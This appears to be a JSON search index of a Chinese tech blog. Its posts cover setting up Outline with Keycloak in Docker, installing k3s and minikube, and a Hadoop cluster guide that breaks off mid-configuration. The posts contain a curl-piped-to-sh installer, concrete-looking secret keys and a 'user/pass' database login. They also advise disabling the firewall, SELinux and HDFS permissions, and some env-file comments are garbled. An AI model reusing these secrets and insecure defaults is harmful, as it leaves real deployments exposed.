[{"content":"Outline搭建 参考文献：docker基于本地存储部署outline团队知识库_outline部署 准备 安装docker、和 docker compose 插件 1 2 3 4 5 6 7 8 9 10 11 12 13 # 常规更新起手 sudo apt update # 安装Docker sudo apt install docker.io -y sudo systemctl enable docker \u0026amp;\u0026amp; sudo systemctl start docker sudo usermod -aG docker $USER # 授予当前用户Docker权限（需重新登录生效） # 安装Docker Compose sudo apt install docker-compose-plugin -y # 验证安装：显示版本即成功 docker compose version docker配置镜像源 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 # 创建配置文件 vim /etc/docker/daemon.json # 粘贴下面内容 { \u0026#34;registry-mirrors\u0026#34;: [ \u0026#34;https://docker.1ms.run\u0026#34;, \u0026#34;https://docker-0.unsee.tech\u0026#34;, \u0026#34;https://docker.m.daocloud.io\u0026#34; ], \u0026#34;live-restore\u0026#34;: true, \u0026#34;features\u0026#34;: { \u0026#34;buildkit\u0026#34;: true } } # 重启docker systemctl daemon-reload systemctl restart docker 部署 创建文件夹路径 1 2 3 4 5 6 7 8 9 # 创建文件路径 / └── data/ ├── keycloak │ └── docker-compose.yml └── outline ├── docker-compose.yml ├── docker.env └── redis.conf keycloak/docker-compose.yml 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 name: \u0026#39;keycloak\u0026#39; networks: stack-network: external: true volumes: keycloak-postgres: services: postgres-keycloak: image: ${KEYCLOAK_POSTGRES_IMAGE_TAG} volumes: - keycloak-postgres:/var/lib/postgresql/data environment: POSTGRES_DB: ${KEYCLOAK_DB_NAME} POSTGRES_USER: ${KEYCLOAK_DB_USER} POSTGRES_PASSWORD: ${KEYCLOAK_DB_PASSWORD} networks: - stack-network healthcheck: test: [ \u0026#34;CMD\u0026#34;, \u0026#34;pg_isready\u0026#34;, \u0026#34;-q\u0026#34;, \u0026#34;-d\u0026#34;, \u0026#34;${KEYCLOAK_DB_NAME}\u0026#34;, \u0026#34;-U\u0026#34;, \u0026#34;${KEYCLOAK_DB_USER}\u0026#34; ] interval: 10s timeout: 5s retries: 3 start_period: 60s restart: unless-stopped keycloak: image: ${KEYCLOAK_IMAGE_TAG} command: start-dev environment: KC_DB: postgres KC_DB_URL_HOST: postgres-keycloak KC_DB_URL_DATABASE: ${KEYCLOAK_DB_NAME} KC_DB_USERNAME: ${KEYCLOAK_DB_USER} KC_DB_PASSWORD: ${KEYCLOAK_DB_PASSWORD} KC_DB_SCHEMA: public KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN_USERNAME} KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD} KC_HEALTH_ENABLED: \u0026#39;true\u0026#39; KC_HOSTNAME: ${KEYCLOAK_HOSTNAME} KC_HTTP_ENABLED: \u0026#39;true\u0026#39; KC_PROXY_HEADERS: \u0026#39;xforwarded\u0026#39; PROXY_ADDRESS_FORWARDING: \u0026#39;true\u0026#39; ports: - \u0026#34;8080:8080\u0026#34; networks: - stack-network healthcheck: test: - \u0026#34;CMD-SHELL\u0026#34; - | exec 3\u0026lt;\u0026gt;/dev/tcp/localhost/9000 \u0026amp;\u0026amp; echo -e \u0026#39;GET /health/ready HTTP/1.1\\r\\nHost: localhost\\r\\nConnection: close\\r\\n\\r\\n\u0026#39; \u0026gt;\u0026amp;3 \u0026amp;\u0026amp; cat \u0026lt;\u0026amp;3 | tee /tmp/healthcheck.log | grep -q \u0026#39;200 OK\u0026#39; interval: 10s timeout: 5s retries: 3 start_period: 90s restart: unless-stopped depends_on: postgres-keycloak: condition: service_healthy outline/docker-compose.yml 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 name: \u0026#34;outline\u0026#34; networks: stack-network: external: true services: outline: image: outlinewiki/outline:0.78.0 env_file: ./docker.env networks: - stack-network ports: - \u0026#34;3000:3000\u0026#34; volumes: - storage-data:/var/lib/outline/data depends_on: - postgres - redis redis: image: redis:7-alpine env_file: ./docker.env networks: - stack-network ports: - \u0026#34;6379:6379\u0026#34; volumes: - ./redis.conf:/redis.conf command: [\u0026#34;redis-server\u0026#34;, \u0026#34;/redis.conf\u0026#34;] healthcheck: test: [\u0026#34;CMD\u0026#34;, \u0026#34;redis-cli\u0026#34;, \u0026#34;ping\u0026#34;] interval: 10s timeout: 30s retries: 3 postgres: image: postgres:16-alpine env_file: ./docker.env networks: - stack-network ports: - \u0026#34;5432:5432\u0026#34; volumes: - database-data:/var/lib/postgresql/data healthcheck: test: [\u0026#34;CMD\u0026#34;, \u0026#34;pg_isready\u0026#34;, \u0026#34;-d\u0026#34;, \u0026#34;outline\u0026#34;, \u0026#34;-U\u0026#34;, \u0026#34;user\u0026#34;] interval: 30s timeout: 20s retries: 3 environment: POSTGRES_USER: \u0026#39;user\u0026#39; POSTGRES_PASSWORD: \u0026#39;pass\u0026#39; POSTGRES_DB: \u0026#39;outline\u0026#39; volumes: storage-data: database-data: outline/docker.env.txt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 # –––––––––––––––– REQUIRED –––––––––––––––– NODE_ENV=production # Generate a hex-encoded 32-byte random key. You should use 33688ac543ce11e5a5e75627821bb72c9f175117b86a734d4421e9264ce6f35d # in your terminal to generate a random value. SECRET_KEY=98ea98adade7b6af8c4252651b195d4083c484b833b8e0e638623ae60cc7d24e # Generate a unique random key. The format is not important but you could still use # ad2d30c9b96ab4fbb192a8eb594215334bd93eea583453e8abfe2e1bb05802c7 in your terminal to produce this. UTILS_SECRET=98ea98adade7b6af8c4252651b195d4083c484b833b8e0e638623ae60cc7d24e # For production point these at your databases, in development the default # should work out of the box. DATABASE_URL=postgres://user:pass@postgres:5432/outline DATABASE_CONNECTION_POOL_MIN= DATABASE_CONNECTION_POOL_MAX= # Uncomment this to disable SSL for connecting to Postgres PGSSLMODE=disable # For redis you can either specify an ioredis compatible url like this REDIS_URL=redis://redis:6379 # or alternatively, if you would like to provide additional connection options, # use a base64 encoded JSON connection option object. Refer to the ioredis documentation # for a list of available options. # Example: Use Redis Sentinel for high availability # {\u0026#34;sentinels\u0026#34;:[{\u0026#34;host\u0026#34;:\u0026#34;sentinel-0\u0026#34;,\u0026#34;port\u0026#34;:26379},{\u0026#34;host\u0026#34;:\u0026#34;sentinel-1\u0026#34;,\u0026#34;port\u0026#34;:26379}],\u0026#34;name\u0026#34;:\u0026#34;mymaster\u0026#34;} # REDIS_URL=ioredis://eyJzZW50aW5lbHMiOlt7Imhvc3QiOiJzZW50aW5lbC0wIiwicG9ydCI6MjYzNzl9LHsiaG9zdCI6InNlbnRpbmVsLTEiLCJwb3J0IjoyNjM3OX1dLCJuYW1lIjoibXltYXN0ZXIifQ== # URL should point to the fully qualified, publicly accessible URL. If using a # proxy the port in URL and PORT may be different. URL=http://192.168.1.11:3000 PORT=3000 # See [documentation](docs/SERVICES.md) on running a separate collaboration # server, for normal operation this does not need to be set. COLLABORATION_URL= # Specify what storage system to use. Possible value is one of \u0026#34;s3\u0026#34; or \u0026#34;local\u0026#34;. # For \u0026#34;local\u0026#34;, the avatar images and document attachments will be saved on local disk. FILE_STORAGE=local # If \u0026#34;local\u0026#34; is configured for FILE_STORAGE above, then this sets the parent directory under # which all attachments/images go. Make sure that the process has permissions to create # this path and also to write files to it. FILE_STORAGE_LOCAL_ROOT_DIR=/var/lib/outline/data # Maximum allowed size for the uploaded attachment. FILE_STORAGE_UPLOAD_MAX_SIZE=262144000 # Override the maximum size of document imports, generally this should be lower # than the document attachment maximum size. FILE_STORAGE_IMPORT_MAX_SIZE= # Override the maximum size of workspace imports, these can be especially large # and the files are temporary being automatically deleted after a period of time. FILE_STORAGE_WORKSPACE_IMPORT_MAX_SIZE= # To support uploading of images for avatars and document attachments in a distributed # architecture an s3-compatible storage can be configured if FILE_STORAGE=s3 above. AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_REGION= AWS_S3_ACCELERATE_URL= AWS_S3_UPLOAD_BUCKET_URL= AWS_S3_UPLOAD_BUCKET_NAME= AWS_S3_FORCE_PATH_STYLE= AWS_S3_ACL= # –––––––––––––– AUTHENTICATION –––––––––––––– # Third party signin credentials, at least ONE OF EITHER Google, Slack, # or Microsoft is required for a working installation or you\u0026#39;ll have no sign-in # options. # To configure Slack auth, you\u0026#39;ll need to create an Application at # =\u0026gt; https://api.slack.com/apps # # When configuring the Client ID, add a redirect URL under \u0026#34;OAuth \u0026amp; Permissions\u0026#34;: # https://\u0026lt;URL\u0026gt;/auth/slack.callback SLACK_CLIENT_ID= SLACK_CLIENT_SECRET= # To configure Google auth, you\u0026#39;ll need to create an OAuth Client ID at # =\u0026gt; https://console.cloud.google.com/apis/credentials # # When configuring the Client ID, add an Authorized redirect URI: # https://\u0026lt;URL\u0026gt;/auth/google.callback GOOGLE_CLIENT_ID= GOOGLE_CLIENT_SECRET= # To configure Microsoft/Azure auth, you\u0026#39;ll need to create an OAuth Client. See # the guide for details on setting up your Azure App: # =\u0026gt; https://wiki.generaloutline.com/share/dfa77e56-d4d2-4b51-8ff8-84ea6608faa4 AZURE_CLIENT_ID= AZURE_CLIENT_SECRET= AZURE_RESOURCE_APP_ID= # To configure generic OIDC auth, you\u0026#39;ll need some kind of identity provider. # See documentation for whichever IdP you use to acquire the following info: # Redirect URI is https://\u0026lt;URL\u0026gt;/auth/oidc.callback OIDC_CLIENT_ID=outline OIDC_CLIENT_SECRET=zmnUeCs2gxqdNgakM7NcRqdBYnVX47gf OIDC_AUTH_URI=\u0026#34;http://192.168.1.11:8080/realms/outline/protocol/openid-connect/auth\u0026#34; OIDC_TOKEN_URI=\u0026#34;http://192.168.1.11:8080/realms/outline/protocol/openid-connect/token\u0026#34; OIDC_USERINFO_URI=\u0026#34;http://192.168.1.11:8080/realms/outline/protocol/openid-connect/userinfo\u0026#34; OIDC_LOGOUT_URI= # Specify which claims to derive user information from # Supports any valid JSON path with the JWT payload OIDC_USERNAME_CLAIM=preferred_username # Display name for OIDC authentication OIDC_DISPLAY_NAME=keycloak # Space separated auth scopes. OIDC_SCOPES=openid profile email # To configure the GitHub integration, you\u0026#39;ll need to create a GitHub App at # =\u0026gt; https://github.com/settings/apps # # When configuring the Client ID, add a redirect URL under \u0026#34;Permissions \u0026amp; events\u0026#34;: # https://\u0026lt;URL\u0026gt;/api/github.callback GITHUB_CLIENT_ID= GITHUB_CLIENT_SECRET= GITHUB_APP_NAME= GITHUB_APP_ID= GITHUB_APP_PRIVATE_KEY= # To configure Discord auth, you\u0026#39;ll need to create a Discord Application at # =\u0026gt; https://discord.com/developers/applications/ # # When configuring the Client ID, add a redirect URL under \u0026#34;OAuth2\u0026#34;: # https://\u0026lt;URL\u0026gt;/auth/discord.callback DISCORD_CLIENT_ID= DISCORD_CLIENT_SECRET= # DISCORD_SERVER_ID should be the ID of the Discord server that Outline is # integrated with. # Used to verify that the user is a member of the server as well as server # metadata such as nicknames, server icon and name. DISCORD_SERVER_ID= # DISCORD_SERVER_ROLES should be a comma separated list of role IDs that are # allowed to access Outline. If this is not set, all members of the server # will be allowed to access Outline. # DISCORD_SERVER_ID and DISCORD_SERVER_ROLES must be set together. DISCORD_SERVER_ROLES= # –––––––––––––––– OPTIONAL –––––––––––––––– # Base64 encoded private key and certificate for HTTPS termination. This is only # required if you do not use an external reverse proxy. See documentation: # https://wiki.generaloutline.com/share/1c922644-40d8-41fe-98f9-df2b67239d45 SSL_KEY= SSL_CERT= # If using a Cloudfront/Cloudflare distribution or similar it can be set below. # This will cause paths to javascript, stylesheets, and images to be updated to # the hostname defined in CDN_URL. In your CDN configuration the origin server # should be set to the same as URL. CDN_URL= # Auto-redirect to https in production. The default is true but you may set to # false if you can be sure that SSL is terminated at an external loadbalancer. FORCE_HTTPS=false # Have the installation check for updates by sending anonymized statistics to # the maintainers ENABLE_UPDATES=true # How many processes should be spawned. As a reasonable rule divide your servers # available memory by 512 for a rough estimate WEB_CONCURRENCY=1 # You can remove this line if your reverse proxy already logs incoming http # requests and this ends up being duplicative DEBUG=http # Configure lowest severity level for server logs. Should be one of # error, warn, info, http, verbose, debug and silly LOG_LEVEL=info # For a complete Slack integration with search and posting to channels the # following configs are also needed, some more details # =\u0026gt; https://wiki.generaloutline.com/share/be25efd1-b3ef-4450-b8e5-c4a4fc11e02a # SLACK_VERIFICATION_TOKEN= SLACK_APP_ID= SLACK_MESSAGE_ACTIONS= # For Dropbox integration, follow these instructions to get the key https://www.dropbox.com/developers/embedder#setup # and do not forget to whitelist your domain name in the app settings DROPBOX_APP_KEY= # Optionally enable Sentry (sentry.io) to track errors and performance, # and optionally add a Sentry proxy tunnel for bypassing ad blockers in the UI: # https://docs.sentry.io/platforms/javascript/troubleshooting/#using-the-tunnel-option) SENTRY_DSN= SENTRY_TUNNEL= # To support sending outgoing transactional emails such as \u0026#34;document updated\u0026#34; or # \u0026#34;you\u0026#39;ve been invited\u0026#34; you\u0026#39;ll need to provide authentication for an SMTP server SMTP_HOST= SMTP_PORT= SMTP_USERNAME= SMTP_PASSWORD= SMTP_FROM_EMAIL= SMTP_REPLY_EMAIL= SMTP_TLS_CIPHERS= SMTP_SECURE=true # The default interface language. See translate.getoutline.com for a list of # available language codes and their rough percentage translated. DEFAULT_LANGUAGE=en_US # Optionally enable rate limiter at application web server RATE_LIMITER_ENABLED=true # Configure default throttling parameters for rate limiter RATE_LIMITER_REQUESTS=1000 RATE_LIMITER_DURATION_WINDOW=60 # Iframely API config #IFRAMELY_URL= #IFRAMELY_API_KEY= 启动 1 2 3 4 5 6 7 8 9 10 11 12 13 14 # 移动到 有 docker-compose.yml文件的路径下 # 启动 keycloak cd /data/keycloak # 启动 docker compose up -d # 启动outline cd /data/outline # 启动 docker compose up -d # 停止 docker compose down ","date":"2025-11-02T00:00:00Z","image":"https://Izumiy0.github.io/p/%E4%BD%BF%E7%94%A8docker%E6%90%AD%E5%BB%BA%E6%9C%AC%E5%9C%B0%E7%9F%A5%E8%AF%86%E5%BA%93outline-%E4%BD%BF%E7%94%A8keycloak%E5%AE%9E%E7%8E%B0%E6%9C%AC%E5%9C%B0%E6%B3%A8%E5%86%8C%E8%AE%A4%E8%AF%81/outline_hu_daece1b65bf39a94.png","permalink":"https://Izumiy0.github.io/p/%E4%BD%BF%E7%94%A8docker%E6%90%AD%E5%BB%BA%E6%9C%AC%E5%9C%B0%E7%9F%A5%E8%AF%86%E5%BA%93outline-%E4%BD%BF%E7%94%A8keycloak%E5%AE%9E%E7%8E%B0%E6%9C%AC%E5%9C%B0%E6%B3%A8%E5%86%8C%E8%AE%A4%E8%AF%81/","title":"使用docker搭建本地知识库Outline 使用keycloak实现本地注册认证"},{"content":"Ubuntu-service-2024使用k3s搭建kubernetesk3s 安装\u0026amp;使用 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 # 国内镜像源安装 curl -sfL https://rancher-mirror.rancher.cn/k3s/k3s-install.sh | INSTALL_K3S_MIRROR=cn sh -s - \\ --system-default-registry \u0026#34;registry.cn-hangzhou.aliyuncs.com\u0026#34; # 卸载 sudo k3s-uninstall.sh # 检查, 要多等一会 kubectl get nodes kubectl get pod -A # 查看是不是都是 0/1, 如果只有1个就没问题 # docker镜像导出为 tar文件, 要确保导出前的镜像可用 docker save test -o test.tar # 导入 ctr , 这样 kubenetes 就可以用本地镜像了 sudo k3s ctr image import test.tar # 查看 ctr 里的镜像 sudo k3s ctr image list # 启动并公开服务给集群外部访问 # 命令创建 deployment, --port 表示deploy服务端口为80 sudo kubectl create deployment nginx --image=base_images/base_nginx --port 80 # 查看 sudo kubectl get all # 启动service , 类型为 NodePort, --target-port=80 是deploy服务所在端口, --node-port=30080就是service对集群外提供服务的端口 sudo kubectl expose deployment base-nginx --type=NodePort --port=80 --target-port=80 --name=base-nginx-service --node-port=30080 # 查看 sudo kubectl get all # 启动完,可能 netstat 查看不到 service 监听的端口, 但是可以正常访问 sudo kubectl get svc -o wide ","date":"2025-09-19T00:00:00Z","image":"https://Izumiy0.github.io/p/ubuntu-service-2024%E4%BD%BF%E7%94%A8k3s%E6%90%AD%E5%BB%BAkubernetes/k3s_hu_65b4856025b4b63f.png","permalink":"https://Izumiy0.github.io/p/ubuntu-service-2024%E4%BD%BF%E7%94%A8k3s%E6%90%AD%E5%BB%BAkubernetes/","title":"Ubuntu-service-2024使用k3s搭建kubernetes"},{"content":"Ubuntu-service-2024使用minicube搭建kubernetes minikube下载安装 官方文档 常用命令 1 2 3 4 5 6 7 8 9 10 11 12 13 14 # 检查 minikube 状态 minikube status # 查看集群信息 minikube kubectl -- cluster-info # 查看节点信息 minikube kubectl -- get nodes # 进入 minikube 环境 minikube ssh # 检查集群状态 minikube status # 查看所有 Pod minikube kubectl -- get pods # 查看 Pod 日志 minikube kubectl -- logs \u0026lt;pod-name\u0026gt; 一般查看官方文档就行,下面是我遇到的问题和解决方案 环境: 2核4G的Ubuntu虚拟机, 驱动是docker 下面是启动脚本 1 2 3 4 5 6 7 8 9 10 11 #!/bin/bash # export HTTP_PROXY=http://your-proxy:port export HTTPS_PROXY=http://your-proxy:port # 使用阿里云镜像启动 minikube, 不过好像没什么用, 不加代理还是不行 minikube start --driver=docker \\ --image-mirror-country=\u0026#39;cn\u0026#39; \\ --image-repository=\u0026#39;registry.cn-hangzhou.aliyuncs.com/google_containers\u0026#39; \\ --memory=2048mb \\ --cpus=2 \\ --force 无法访问docker的权限问题导致启动失败 解决方案:\n1 2 3 4 5 6 7 8 9 10 11 # 1.将当前用户添加到 docker 组 sudo usermod -aG docker $USER # 退出当前会话并重新登录，或者使用以下命令立即生效 newgrp docker # 2.使用root用户启动 # 3.不使用docker驱动, 可以直接在主机运行或者使用 kvm的等 # 加上参数 --driver=none #直接在物理机运行kubernetes ctl --driver=kvm\t#使用kvm替代docker docker驱动时,第一次启动需要拉取镜像的网络问题 解决方案:\n1 2 3 # 加代理 export HTTP_PROXY=http://your-proxy:port export HTTPS_PROXY=http://your-proxy:port 未安装虚拟机驱动导致minikube start 报错 Exiting due to DRV_NOT_DETECTED 1 2 # 安装 KVM 如 Ubuntu： sudo apt install qemu-kvm 资源不足导致启动失败 1 2 3 4 # 调整资源分配, 看自己情况给多或者给少一些 minikube config set memory 4096 # 分配 4GB 内存 minikube config set cpus 2 # 分配 2 核 CPU minikube delete \u0026amp;\u0026amp; minikube start 未清理旧集群, 多次启动失败后残留配置冲突 1 2 # 彻底删除旧集群 minikube delete --all --purge 运行第一个 Kubernetes 应用 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 # 部署 Nginx 服务, 需要docker里有nginx镜像 minikube kubectl -- create deployment fuzzing --image=fuzzing # --port=8000 指要监听容器的80端口, 也就是镜像提供服务的端口 minikube kubectl -- create deployment fuzzing --image=utibetctf/fuzzing --port=80 # --port=8000 service的端口 # --target-port 80 转发到 Pod 的哪个端口 minikube kubectl -- expose deployment fuzzing --type=NodePort --port=8000 --target-port 80 # 访问服务 minikube service nginx # 查看 Service 详情 minikube kubectl -- get service fuzzing -o wide # 删除 # 首先查看所有资源 minikube kubectl -- get all --show-labels # 根据显示的资源名称精确删除 minikube kubectl -- delete deployment/\u0026lt;name\u0026gt; service/\u0026lt;name\u0026gt; ","date":"2025-09-19T00:00:00Z","image":"https://Izumiy0.github.io/p/ubuntu-service-2024%E4%BD%BF%E7%94%A8minicube%E6%90%AD%E5%BB%BAkubernetes/minikube_hu_8234b4ceaa65943d.png","permalink":"https://Izumiy0.github.io/p/ubuntu-service-2024%E4%BD%BF%E7%94%A8minicube%E6%90%AD%E5%BB%BAkubernetes/","title":"Ubuntu-service-2024使用minicube搭建kubernetes"},{"content":"超详细 Hadoop 集群搭建指南：从环境准备到成功启动 作为大数据生态体系的核心框架，Hadoop 的分布式集群部署是入门大数据技术的关键一步。本文将以Hadoop 3.3.4 版本为例，带大家从零开始搭建一个 3 节点（1 主 2 从）的 Hadoop 集群，全程附带关键配置代码和避坑要点，确保新手也能顺利完成搭建。\n一、环境准备：打好集群基础 在正式搭建前，需先完成硬件规划、操作系统配置和软件依赖安装，这是集群稳定运行的前提。\n1.1 集群节点规划 本次搭建采用 “1 主 2 从” 架构，节点角色分配如下（可根据实际服务器数量调整）：\n节点 IP 主机名 角色 硬件建议（最低配置） 192.168.1.10 hadoop01 NameNode、ResourceManager 2 核 4G 内存、50G 硬盘 192.168.1.11 hadoop02 DataNode、NodeManager 2 核 2G 内存、50G 硬盘 192.168.1.12 hadoop03 DataNode、NodeManager 2 核 2G 内存、50G 硬盘 注意：所有节点需处于同一局域网，且关闭防火墙（避免端口拦截）。\n1.2 操作系统配置（所有节点执行） 本文使用CentOS 7系统，以下操作需以root用户或sudo权限执行：\n（1）关闭防火墙与 SELinux Hadoop 集群各节点间需通过多个端口通信，关闭防火墙可避免配置复杂的端口规则：\n1 2 3 4 5 6 7 8 9 10 11 # 关闭防火墙（临时+永久） systemctl stop firewalld systemctl disable firewalld # 关闭SELinux（临时+永久） setenforce 0 sed -i \u0026#39;s/SELINUX=enforcing/SELINUX=disabled/\u0026#39; /etc/selinux/config （2）配置主机名与 IP 映射 设置主机名（每个节点执行对应命令）： 1 2 3 4 5 6 7 8 9 10 11 # hadoop01节点 hostnamectl set-hostname hadoop01 # hadoop02节点 hostnamectl set-hostname hadoop02 # hadoop03节点 hostnamectl set-hostname hadoop03 配置 IP 映射（所有节点执行，将 IP 替换为你的实际节点 IP）： 1 2 3 4 5 echo \u0026#34;192.168.1.10 hadoop01\u0026#34; \u0026gt;\u0026gt; /etc/hosts echo \u0026#34;192.168.1.11 hadoop02\u0026#34; \u0026gt;\u0026gt; /etc/hosts echo \u0026#34;192.168.1.12 hadoop03\u0026#34; \u0026gt;\u0026gt; /etc/hosts （3）安装 Java 环境 Hadoop 依赖 Java（需 JDK 8 及以上版本），推荐使用 OpenJDK：\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 # 安装OpenJDK 8 yum install -y java-1.8.0-openjdk-devel # 验证安装（出现版本信息则成功） java -version javac -version # 配置JAVA_HOME环境变量（所有节点执行） echo \u0026#34;export JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk\u0026#34; \u0026gt;\u0026gt; /etc/profile echo \u0026#34;export PATH=$PATH:$JAVA_HOME/bin\u0026#34; \u0026gt;\u0026gt; /etc/profile source /etc/profile # 生效配置 1.3 配置 SSH 免密登录（主节点→从节点） Hadoop 主节点（hadoop01）需通过 SSH 免密登录到所有从节点，避免启动集群时输入密码：\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 # 在hadoop01节点生成SSH密钥（一路回车，不设置密码） ssh-keygen -t rsa # 将公钥分发到所有节点（包括自身） ssh-copy-id hadoop01 ssh-copy-id hadoop02 ssh-copy-id hadoop03 # 验证免密登录（无密码提示则成功） ssh hadoop02 二、Hadoop 安装与核心配置 2.1 下载并解压 Hadoop（主节点执行） 从 Apache 官网下载 Hadoop 安装包，推荐使用稳定版 3.3.4：\n1 2 3 4 5 6 7 8 9 10 11 # 下载Hadoop（也可手动下载后上传） wget https://archive.apache.org/dist/hadoop/core/hadoop-3.3.4/hadoop-3.3.4.tar.gz # 解压到/usr/local目录 tar -zxvf hadoop-3.3.4.tar.gz -C /usr/local/ # 重命名为hadoop（方便后续操作） mv /usr/local/hadoop-3.3.4 /usr/local/hadoop 2.2 配置 Hadoop 环境变量（所有节点执行） 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 # 编辑profile文件 vim /etc/profile # 添加以下内容（末尾添加） export HADOOP_HOME=/usr/local/hadoop export PATH=$PATH:$HADOOP_HOME/bin:$HADOOP_HOME/sbin # 生效配置 source /etc/profile # 验证（出现版本信息则成功） hadoop version 2.3 修改 Hadoop 核心配置文件（主节点执行） Hadoop 配置文件位于$HADOOP_HOME/etc/hadoop/目录，需修改以下 5 个关键文件：\n（1）hadoop-env.sh（指定 Java 路径） 1 2 3 4 5 vim $HADOOP_HOME/etc/hadoop/hadoop-env.sh # 添加Java环境变量（替换为你的JAVA_HOME路径） export JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk （2）core-site.xml（核心配置：指定 NameNode 地址） 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 vim $HADOOP_HOME/etc/hadoop/core-site.xml # 在\u0026lt;configuration\u0026gt;标签内添加： \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;fs.defaultFS\u0026lt;/name\u0026gt; \u0026lt;!-- NameNode地址：hdfs://主机名:端口 --\u0026gt; \u0026lt;value\u0026gt;hdfs://hadoop01:9000\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;hadoop.tmp.dir\u0026lt;/name\u0026gt; \u0026lt;!-- Hadoop临时目录（需手动创建） --\u0026gt; \u0026lt;value\u0026gt;/usr/local/hadoop/tmp\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; （3）hdfs-site.xml（HDFS 配置：副本数、NameNode/DataNode 存储路径） 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 vim $HADOOP_HOME/etc/hadoop/hdfs-site.xml # 在\u0026lt;configuration\u0026gt;标签内添加： \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;dfs.replication\u0026lt;/name\u0026gt; \u0026lt;!-- 副本数（建议\u0026lt;=从节点数，这里设为2） --\u0026gt; \u0026lt;value\u0026gt;2\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;dfs.namenode.name.dir\u0026lt;/name\u0026gt; \u0026lt;!-- NameNode数据存储路径（需手动创建） --\u0026gt; \u0026lt;value\u0026gt;/usr/local/hadoop/dfs/name\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;dfs.datanode.data.dir\u0026lt;/name\u0026gt; \u0026lt;!-- DataNode数据存储路径（需手动创建） --\u0026gt; \u0026lt;value\u0026gt;/usr/local/hadoop/dfs/data\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;!-- 关闭HDFS权限检查（新手友好） --\u0026gt; \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;dfs.permissions.enabled\u0026lt;/name\u0026gt; \u0026lt;value\u0026gt;false\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; （4）mapred-site.xml（MapReduce 配置：指定 YARN 为资源管理器） 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 vim $HADOOP_HOME/etc/hadoop/mapred-site.xml # 在\u0026lt;configuration\u0026gt;标签内添加： \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;mapreduce.framework.name\u0026lt;/name\u0026gt; \u0026lt;!-- 指定MapReduce运行在YARN上 --\u0026gt; \u0026lt;value\u0026gt;yarn\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;mapreduce.application.classpath\u0026lt;/name\u0026gt; \u0026lt;!-- Hadoop 3.x需指定classpath，避免启动报错 --\u0026gt; \u0026lt;value\u0026gt;$HADOOP_HOME/share/hadoop/mapreduce/*:$HADOOP_HOME/share/hadoop/mapreduce/lib/*\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; （5）yarn-site.xml（YARN 配置：指定 ResourceManager 地址、节点管理器环境） 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 vim $HADOOP_HOME/etc/hadoop/yarn-site.xml # 在\u0026lt;configuration\u0026gt;标签内添加： \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;yarn.resourcemanager.hostname\u0026lt;/name\u0026gt; \u0026lt;!-- ResourceManager运行在主节点hadoop01 --\u0026gt; \u0026lt;value\u0026gt;hadoop01\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;name\u0026gt;yarn.nodemanager.aux-services\u0026lt;/name\u0026gt; \u0026lt;!-- 启用MapReduce的shuffle服务 --\u0026gt; \u0026lt;value\u0026gt;mapreduce_shuffle\u0026lt;/value\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;!-- 解决Hadoop 3.x内存溢出问题 --\u0026gt; \u0026lt;property\u0026gt; 